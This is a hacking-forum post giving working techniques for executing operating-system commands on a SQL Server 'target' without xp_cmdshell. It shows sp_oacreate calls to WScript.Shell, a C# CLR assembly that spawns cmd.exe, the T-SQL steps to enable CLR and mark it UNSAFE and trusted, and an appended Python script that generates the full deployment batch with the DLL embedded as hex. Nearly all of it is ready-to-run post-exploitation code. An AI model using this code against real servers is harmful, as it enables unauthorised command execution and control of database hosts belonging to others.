  • Hello visitors, welcome to the Hacker World Forum!

Executing commands on SQL Server without xp_cmdshell

Executing commands via COM

(Requires the Ole Automation Procedures component to be enabled)

declare @luan int, @exec int, @text int, @str varchar(8000);
-- {72C24DD5-D70A-438B-8A42-98424B88AFB8} is the CLSID of WScript.Shell (the ProgID 'WScript.Shell' works as well)
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}', @luan output;
-- WshShell.Exec starts the process and returns a WshScriptExec object; T-SQL strings are not escaped, so use single backslashes
exec sp_oamethod @luan, 'exec', @exec output, 'C:\Windows\System32\cmd.exe /c whoami';
-- ReadAll blocks until the process closes stdout; stderr is a separate stream, append 2>&1 to the command to capture it too
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out;
select @str;


If Ole Automation Procedures is not enabled, it can be turned on with the following commands (this is an advanced option, so 'show advanced options' has to be set first):

sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO

Writing a CLR assembly to execute commands

Language: C#
Create a Class Library project in Visual Studio (target the .NET Framework; SQL Server's CLR host cannot load .NET Core / .NET 5+ assemblies)

using System;
using System.Diagnostics;

namespace shellexec
{
    public class exec
    {
        // Runs `command` through cmd.exe and returns its output.
        // Exposed to T-SQL via CREATE FUNCTION ... EXTERNAL NAME [MySqlCLR].[shellexec.exec].cmd
        public static string cmd(string command)
        {
            Process pro = new Process();
            pro.StartInfo.FileName = "cmd.exe";
            pro.StartInfo.UseShellExecute = false;       // required when redirecting streams
            pro.StartInfo.RedirectStandardInput = true;  // commands are written to stdin
            pro.StartInfo.RedirectStandardOutput = true; // output is read back from stdout
            pro.StartInfo.RedirectStandardError = false; // stderr is merged into stdout below; redirecting it without ever reading it can deadlock
            pro.StartInfo.CreateNoWindow = true;         // no console window on the server
            pro.Start();
            pro.StandardInput.AutoFlush = true;          // flush each line immediately
            // 2>&1 merges stderr into stdout; "exit" is sent as its own line so cmd.exe terminates even when the command fails
            pro.StandardInput.WriteLine(command + " 2>&1");
            pro.StandardInput.WriteLine("exit");
            pro.StandardInput.Close();
            string output = pro.StandardOutput.ReadToEnd(); // read until cmd.exe closes stdout
            pro.WaitForExit();                              // wait for the process to finish
            pro.Close();
            return output;
        }
    }
}

After building the DLL, it can be written to the target as hex (CREATE ASSEMBLY accepts the assembly bytes inline as a 0x... literal) or uploaded through a shell. Then construct the following:

1. CLR integration must be enabled on the target instance

exec sp_configure 'clr enabled', 1;  -- enable CLR on the SQL Server instance
reconfigure;
go

 

2. The target database's TRUSTWORTHY property must be ON (an UNSAFE assembly can only be created in a TRUSTWORTHY database whose owner holds UNSAFE ASSEMBLY permission, which sa does, or it must be signed). On SQL Server 2017 and later, 'clr strict security' is on by default and treats every assembly as UNSAFE; if TRUSTWORTHY cannot be set, the assembly's SHA-512 hash can be whitelisted with sp_add_trusted_assembly instead.

ALTER DATABASE [<database name>] SET TRUSTWORTHY ON

 

3. Register the DLL in the database (the path is opened by the SQL Server service on the server, not by the client; to avoid placing a file on the server, use FROM 0x<hex bytes of the DLL> instead)

CREATE ASSEMBLY MySqlCLR FROM '<path to the dll>'  -- MySqlCLR is the name the imported assembly gets inside the database

 

4. Create the function
(Declare parameter types matching the C# method's signature; when the method returns a string, declare RETURNS nvarchar(max) so nothing is truncated. EXTERNAL NAME names the assembly, then the namespace and class, then the method.)

CREATE FUNCTION [dbo].[cmd2]  
(  
    @cmd AS NVARCHAR(max)
)  
RETURNS [nvarchar] (max) WITH EXECUTE AS CALLER
AS  
EXTERNAL NAME [MySqlCLR].[shellexec.exec].cmd  -- shellexec is the namespace, exec the class, cmd the method
GO

5. The assembly's permission set must be UNSAFE, otherwise deployment fails: starting a process (System.Diagnostics.Process) is blocked by SQL Server's host protection for SAFE and EXTERNAL_ACCESS assemblies. The permission set can also be given directly on CREATE ASSEMBLY with WITH PERMISSION_SET = UNSAFE.
ALTER ASSEMBLY [MySqlCLR]
WITH PERMISSION_SET = UNSAFE

6. Call the function
select [dbo].[cmd2]('whoami')
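The "hex method" mentioned above, and the trusted-assembly alternative to TRUSTWORTHY, as an added example (not the original poster's code): a Python script that turns the compiled DLL into the complete deployment batch, with the assembly bytes embedded as a 0x literal so nothing has to be written to the server's file system, plus the matching cleanup batch. It assumes the C# assembly above (namespace shellexec, class exec, method cmd) and the names MySqlCLR / cmd2 used in the steps; the target database "master" and the byte string used when no DLL path is given are constructed placeholders.

```python
"""Generate the T-SQL that deploys a CLR command-execution assembly as a hex literal.

Added example for this post (not the original author's code). Assumes the C#
assembly above: namespace shellexec, class exec, static method cmd(string).
The byte string used at the bottom is a constructed placeholder, not a real DLL.
"""
import hashlib
import sys


def to_hex_literal(data: bytes) -> str:
    """Render bytes as a T-SQL binary literal: 0x followed by uppercase hex, no separators."""
    return "0x" + data.hex().upper()


def assembly_sha512(data: bytes) -> str:
    """SHA2_512 of the raw assembly bytes, the value sp_add_trusted_assembly expects."""
    return "0x" + hashlib.sha512(data).hexdigest().upper()


def build_deploy_script(dll_bytes: bytes, database: str,
                        assembly: str = "MySqlCLR", function: str = "cmd2",
                        external_name: str = "[shellexec.exec].cmd",
                        trusted_assembly: bool = False) -> str:
    """Return the whole deployment batch: enable CLR, authorise the assembly, load it
    from the hex literal as UNSAFE, bind the T-SQL function and run whoami.

    trusted_assembly=False marks the database TRUSTWORTHY (steps 2 and 3 above).
    trusted_assembly=True whitelists the exact assembly hash with sp_add_trusted_assembly
    instead, the route when 'clr strict security' is on and TRUSTWORTHY is not an option.
    """
    if dll_bytes[:2] != b"MZ":
        # every PE image starts with the MZ magic; anything else is a truncated or wrong file
        raise ValueError("not a PE image: DLL bytes do not start with MZ")

    lines = [
        f"USE [{database}];",
        "GO",
        "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
        "EXEC sp_configure 'clr enabled', 1; RECONFIGURE;",
        "GO",
    ]
    if trusted_assembly:
        lines += [
            "-- whitelist these exact assembly bytes (server-wide list, keyed by SHA2_512)",
            f"EXEC sp_add_trusted_assembly @hash = {assembly_sha512(dll_bytes)}, "
            f"@description = N'{assembly}';",
        ]
    else:
        lines.append(f"ALTER DATABASE [{database}] SET TRUSTWORTHY ON;")
    lines += [
        "GO",
        "-- the DLL travels inside the statement; UNSAFE is required because the method spawns a process",
        f"CREATE ASSEMBLY [{assembly}] FROM {to_hex_literal(dll_bytes)} WITH PERMISSION_SET = UNSAFE;",
        "GO",
        f"CREATE FUNCTION [dbo].[{function}](@cmd NVARCHAR(MAX)) RETURNS NVARCHAR(MAX)",
        "WITH EXECUTE AS CALLER",
        f"AS EXTERNAL NAME [{assembly}].{external_name};",
        "GO",
        f"SELECT [dbo].[{function}](N'whoami');",
        "GO",
    ]
    return "\n".join(lines)


def build_cleanup_script(database: str, assembly: str = "MySqlCLR",
                         function: str = "cmd2", dll_bytes: bytes = None) -> str:
    """Undo the deployment: drop the function and assembly, reset TRUSTWORTHY and,
    when the hash route was used, remove the trusted-assembly entry again."""
    lines = [
        f"USE [{database}];",
        "GO",
        f"DROP FUNCTION [dbo].[{function}];",
        f"DROP ASSEMBLY [{assembly}];",
        f"ALTER DATABASE [{database}] SET TRUSTWORTHY OFF;",
    ]
    if dll_bytes is not None:
        lines.append(f"EXEC sp_drop_trusted_assembly @hash = {assembly_sha512(dll_bytes)};")
    lines.append("GO")
    return "\n".join(lines)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:      # path to the compiled shellexec DLL
            dll = fh.read()
    else:
        dll = b"MZ" + bytes(14)                   # constructed placeholder so the script runs without a DLL
    print(build_deploy_script(dll, "master", trusted_assembly="--trusted" in sys.argv))
    print()
    print(build_cleanup_script("master", dll_bytes=dll if "--trusted" in sys.argv else None))
```

Run it as `python gen_clr.py shellexec.dll > deploy.sql` (add `--trusted` to use sp_add_trusted_assembly instead of TRUSTWORTHY) and paste the output into the SQL client. The hex literal is a single long token, so the batch must be sent as one statement; the MZ check catches the common case of a DLL that was truncated on transfer before the server reports an unhelpful load error.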

 


Reference links:
https://blog.csdn.net/catchme_439/article/details/78411009
https://zhuanlan.zhihu.com/p/33322584?from_voters_page=true
